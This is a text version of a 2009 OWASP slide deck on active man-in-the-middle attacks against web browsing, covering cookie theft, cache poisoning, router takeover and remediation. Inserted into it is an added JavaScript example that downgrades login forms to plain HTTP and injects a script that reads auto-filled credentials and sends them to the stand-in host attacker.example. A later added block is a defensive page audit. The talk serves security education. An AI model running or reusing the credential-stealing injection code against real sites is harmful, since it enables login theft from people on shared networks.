IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Active Man in the Middle Attacks
The OWASP Foundation
OWASP
http://www.owasp.org
27/02/2009
Adi Sharabani
Security Research Group Manager, IBM Rational Application Security (a.k.a. Watchfire)
adish
Agenda
Background – Man in the Middle
– Network level – heavily researched
– Web application level – sporadic research
Outline
– Passive MitM attacks
– Active MitM attacks
– Penetrating an internal network
– Remediation
Man in the Middle Scenario
– All laptop users connect to a public network
– Wireless connection can easily be compromised or impersonated
– Wired connections might also be compromised
Rules of Thumb – Don'ts …
Someone might be listening to the requests
– Don't browse sensitive sites
– Don't supply sensitive information
Someone might be altering the responses
– Don't trust any information given on web sites
– Don't execute downloaded code
Rules of Thumb – What Can You Do?
This leaves us with:
– Browse your favorite news site
– Browse your favorite weather site
[Diagram: non-sensitive sites ("boring") vs. sensitive sites ("interesting"), both reached over the Internet]
You are still vulnerable
Mitigating a Fallacy
Fallacy
– Executing JavaScript on the victim == executing an attack
Reality
– Same origin policy confines a script to the origin it was served from
– Executing an attack requires either
  – JavaScript + a browser implementation bug, or
  – JavaScript + execution on a specific (interesting) domain
    – Can be done through XSS
Passive Man in the Middle Attacks
– Victim browses to a website
– Attacker views the request, manipulates it and forwards it to the server
– Server returns a response
– Attacker views the response, manipulates it and forwards it to the victim
– Other servers are not affected
Active Man in the Middle Attack
The attacker actively directs the victim to an "interesting" site; the IFRAME could be invisible
– Victim browses to a "boring" site (e.g., My Weather Channel)
– Attacker transfers the request to the server
– Server returns a response
– Attacker adds an IFRAME referencing an "interesting" site (e.g., My Bank Site)
– Automatic request sent to the interesting server
– Other servers are not affected
Stealing Cookies*
– Automatic request contains the victim's cookies for the "interesting" domain
– Obvious result: stealing cookies associated with any domain the attacker desires
– Will also work for HttpOnly cookies (as opposed to XSS attacks), since the cookies are read off the wire rather than from the DOM
– Caveat: the automatic request is plain HTTP, so cookies marked Secure are not sent by the browser and are not exposed this way
* A similar attack was presented by Mike Perry – SideJacking
Demo
Overcoming Same Origin Policy
– Victim surfs to a "boring" site
– Attacker injects an IFRAME directing to an "interesting" site
– Automatic request sent to the interesting server
– Attacker forwards the automatic request to the "interesting" server
– "Interesting" server returns a response
– Attacker adds a malicious script to the response
– Script executes with the "interesting" server's restrictions (i.e., in that server's origin)
Result
– Attacker can execute scripts on any domain she desires
– Scripts can fully interact with any "interesting" website
Limitations
– Will only work for non-SSL web sites
Secure Connections
Login Mechanism
Secure Connections
[Diagram: "Please Login" form with Username (jsmith) and Password (********) fields and a SUBMIT button, followed by "Login Successful: Hello John Smith"]
– Victim browses to site http://www.webmail.site
– Site returns a response with a login form
– Victim fills in login details and submits the form
– Login request is sent through a secure channel
– The pre-login page is sent in clear text
– Attacker could alter the pre-login response (e.g., the form's action) to make the login request be sent unencrypted
Stealing Auto Completion Information*
– Attacker redirects the victim to a pre-login page
– Attacker returns the original login form together with a malicious script
– Script accesses the auto-completion information using the DOM
Result
– Attacker can steal any auto-completion information she desires
Limitations
– Will only work for pre-login pages that are not encrypted
– Will not work seamlessly in IE
* A passive version of this attack was described by RSnake in his blog
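The functions below are an added example (not code from the original slides or from IBM/Watchfire) of the two manipulations an active MitM applies to an unencrypted pre-login page: rewriting the form's `https://` action to `http://` so the submitted credentials cross the attacker's proxy in the clear, and appending a script that waits for the browser's auto-completion to fill the form and then reads the values through the DOM. The exfiltration URL `http://attacker.example/c`, the sample login page and the polling interval are assumptions made for the example; a real proxy would apply `rewriteLoginPage` to the response body instead of the generic injection.

```javascript
// Added example (not from the original slides): rewriting an unencrypted
// pre-login page so the login form posts over plain HTTP and so that the
// values the browser auto-fills are read from the DOM and leaked.
// The exfiltration host and the sample page are assumptions.

// 1. Downgrade: every form action that points at https:// now points at http://,
//    so credentials the victim submits pass through the attacker in the clear.
function downgradeFormActions(html) {
  return html.replace(/(<form\b[^>]*\baction\s*=\s*["']?)https:\/\//gi, '$1http://');
}

// 2. Client-side script: once the browser has auto-completed the form, read the
//    field values via the DOM and send them to the attacker in an image request.
function buildAutofillStealer(exfilUrl) {
  return `
(function () {
  function grab() {
    var parts = [];
    var inputs = document.querySelectorAll('input[type=text],input[type=email],input[type=password]');
    for (var i = 0; i < inputs.length; i++) {
      if (inputs[i].value) {
        parts.push(encodeURIComponent(inputs[i].name || inputs[i].id) + '=' +
                   encodeURIComponent(inputs[i].value));
      }
    }
    if (!parts.length) return false;
    new Image().src = ${JSON.stringify(exfilUrl)} + '?' + parts.join('&');
    return true;
  }
  // Auto-completion fills the fields shortly after load; poll until it has.
  var tries = 0;
  var timer = setInterval(function () {
    if (grab() || ++tries >= 10) clearInterval(timer);
  }, 500);
})();`;
}

// 3. Both together: the victim receives the original login page, only with the
//    form downgraded and the stealer script placed before </body>.
function rewriteLoginPage(html, exfilUrl) {
  const script = `<script>${buildAutofillStealer(exfilUrl)}</script>`;
  const downgraded = downgradeFormActions(html);
  const m = /<\/body\s*>/i.exec(downgraded);
  return m ? downgraded.slice(0, m.index) + script + downgraded.slice(m.index)
           : downgraded + script;
}

// Constructed sample of a "partial SSL" login page that is served over http://
// but posts to https:// (the webmail.site case from the slides).
const SAMPLE_LOGIN_PAGE = `<html><body>
<form method="post" action="https://www.webmail.site/login">
  <input type="text" name="user"><input type="password" name="pass">
  <input type="submit" value="SUBMIT">
</form></body></html>`;
```

The downgrade is the part that defeats the "login goes over SSL" argument: the browser never sees the secure action because the attacker changed it before the page rendered. The stealer works regardless of where the form posts, which is why the slides recommend turning auto-completion off.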
Demo
Broadening the Attack (Time Dimension)
[Diagram: passive MitM attacks cover the present ("boring" sites); active MitM attacks extend the reach to the past and the future ("interesting" sites)]
Session Fixation
– Attacker redirects the victim to the site of interest
– Attacker returns a page with a cookie generated by the server (a session identifier the attacker already holds)
– Cookie is saved on the victim's computer
– A while later, the victim connects to the site (with the pre-provided cookie) and logs in
– Attacker uses the same cookie to connect to the server
– Server authenticates the attacker as the victim
Result
– Attacker can set persistent cookies on the victim
Limitations
– The vulnerability also lies within the server: it must accept a session identifier it issued before login and keep using it after login
Cache Poisoning
– Attacker redirects the victim to the site of interest
– Attacker returns a malicious page with caching enabled (cache headers that keep it for a long time)
– Page is cached on the victim's computer
– A while later, the victim visits the site and the cached malicious page is served instead of the real one
Result
– Attacker can poison any page she desires
– Poisoned pages will be persistent
Limitations
– Attacker can poison only non-SSL resources
Complex Hacking Intranet Networks
Penetrating Internal Network – Simple Cache Poison
Result
– The attack is launched every time the victim accesses the resource
– The attack is executed from within the local intranet
Characteristics
– Firewall protections are helpless
– Affected servers will never know
– The attack is persistent
Setting Up a Future MitM Scenario
– Using active MitM techniques, the attacker poisons the victim's cache related to the router's web access
– The victim's router-related cache is poisoned with a malicious script
– The malicious script executes when the victim tries to access the router
– The script configures the router to tunnel future communication through the attacker
– The script hides the configuration changes
[Diagram: router settings page showing "Outbound Proxy IP Address 216.187.118.221" and "Primary DNS Server Address 216.187.118.221"]
Result
– Facilitates future MitM scenarios
– Does not require the router's credentials (the script runs in the victim's own router session)
– Fake settings could be displayed to the user
Limitations
– Requires the victim to access the router in the future
– Need to guess the router's address (e.g., 10.0.1.1)
Increasing the Exposure
– Poison common home pages
  – Script will execute every time the victim opens his browser
– Poison common scripts
  – Script will execute on every page using the common script
  – Example: http://www.google-analytics.com/ga.js
– The "double active" attack
  – Common poisoned page redirects to another poisoned resource
The Double Active Cache Poisoning Attack
– Using active MitM techniques, the attacker poisons a common router address (e.g., 10.0.1.1)
– Attacker also poisons common home pages
– At a later time, the victim opens the browser
– The cached home page is loaded and redirects the victim's browser to the router's web interface
– The cached router web interface is loaded and the malicious script changes the router's settings
– Router is compromised by the malicious script
Result
– Internal network has been compromised
Limitation
– Need to guess the router's IP and credentials
Active Attack Characteristics
– Not noticeable in the user's experience
– Not noticeable by any of the web sites
– IPS/IDS will not block it
– Can be persistent
– Can be used to hack into the local organization
– Bypasses any firewall or VPN
– Can be used with DNS pinning techniques
– A problem with the current design
– Requires only one plain HTTP request to be transmitted
Remediation
Users
– Do not use auto-completion
– "Clean slate policy"
– Trust level separation
  – Two different browsers
  – Two different users
  – Two different OSs
  – Virtualization products
– Tunnel communication through a secure proxy
  – Might not be allowed in many hot-spots
Web owners
– Consider the risks of partial SSL sites
– Do not consider a secure VPN connection as an SSL replacement
– Use random tokens for common scripts
  – While considering performance issues
– Avoid referring to external scripts from internal sites
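As an added example of how a web owner can check the first and last of these points (it is not code from the original slides or from IBM/Watchfire), the audit below takes the URL a page was fetched from and its HTML and flags the conditions the attacks above rely on: a login form on a page that itself arrived over plain HTTP (the partial-SSL case, even when the form posts to https://), a login form that posts over plain HTTP, scripts included from another origin, and plain-HTTP scripts on an HTTPS page. The finding texts, the `auditPage` name and the sample HTML are this example's own.

```javascript
// Added example (not from the original slides): a small audit of a page's HTML
// for the conditions active MitM attacks rely on. Finding texts and the sample
// input are this example's own.

// Parse the attributes of one opening tag into a lower-cased name -> value map.
function attrs(tag) {
  const out = {};
  const re = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  let m;
  while ((m = re.exec(tag))) out[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  return out;
}

function auditPage(pageUrl, html) {
  const page = new URL(pageUrl);
  const plain = page.protocol === 'http:';
  const findings = [];

  // Partial SSL: a login form (has a password field) on a page that itself
  // arrived over plain HTTP. The action may be https, but an attacker can
  // rewrite the page before the user ever submits it.
  const forms = html.match(/<form\b[^>]*>[\s\S]*?<\/form>/gi) || [];
  for (const form of forms) {
    const a = attrs(form.match(/<form\b[^>]*>/i)[0]);
    const hasPassword = /<input\b[^>]*type\s*=\s*["']?password/i.test(form);
    if (!hasPassword) continue;
    if (plain) findings.push(`login form served over plain HTTP (action ${a.action || '(same page)'})`);
    if (a.action && /^http:\/\//i.test(a.action)) findings.push(`login form posts over plain HTTP to ${a.action}`);
  }

  // External scripts: anyone on the path to that other origin can replace the
  // script or poison its cached copy; a plain-HTTP script on an HTTPS page hands
  // the attacker the HTTPS origin as well.
  const scripts = html.match(/<script\b[^>]*\bsrc\s*=[^>]*>/gi) || [];
  for (const tag of scripts) {
    const src = attrs(tag).src;
    if (!src) continue;
    const u = new URL(src, page);
    if (u.host !== page.host) findings.push(`external script from ${u.origin}${u.pathname}`);
    if (!plain && u.protocol === 'http:') findings.push(`plain-HTTP script ${u.href} on an HTTPS page`);
  }
  return findings;
}

// Constructed sample: a webmail front page served over http:// whose login
// form posts to https:// and which pulls the common analytics script.
const SAMPLE_HTML = `<html><head>
<script src="http://www.google-analytics.com/ga.js"></script>
</head><body>
<form method="post" action="https://www.webmail.site/login">
  <input type="text" name="user"><input type="password" name="pass">
</form></body></html>`;
```

Run `auditPage('http://www.webmail.site/', SAMPLE_HTML)` to see both findings for the sample. The regexes are enough for a quick check; for a real site, run the audit over pages fetched as the browser would and feed it a proper HTML parser's output.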
Industry
– Build an integrity mechanism for HTTP
– Secure WiFi networks
Summary
Active MitM attacks
– Broaden the scope of the passive attacks
– Design issues
– Dimension of time
  – Past (steal cookies, auto-completion information, cache)
  – Future (set up cookies, poison cache, poison form filler)
– Penetrating internal networks
– Persistent
– Bypass any current protection mechanisms
More information
– Paper and presentation will be uploaded to our blog: http://blog.watchfire.com
References
– Watchfire's Blog: http://blog.watchfire.com
– Wireless Man in the Middle Attacks: http://www.informit.com/articles/article.aspx?p=353735&seqNum=7
– SideJacking: http://erratasec.blogspot.com/2007/08/sidejacking-with-hamster_05.html
– More on SideJacking: http://erratasec.blogspot.com/2008/01/more-sidejacking.html
– Active SideJacking: http://seclists.org/bugtraq/2007/Aug/0070.html
– Surf Jacking: http://resources.enablesecurity.com/resources/Surf%20Jacking.pdf
– Stealing User Information: http://ha.ckers.org/blog/20060821/stealing-user-information-via-automatic-form-filling/
Thank you!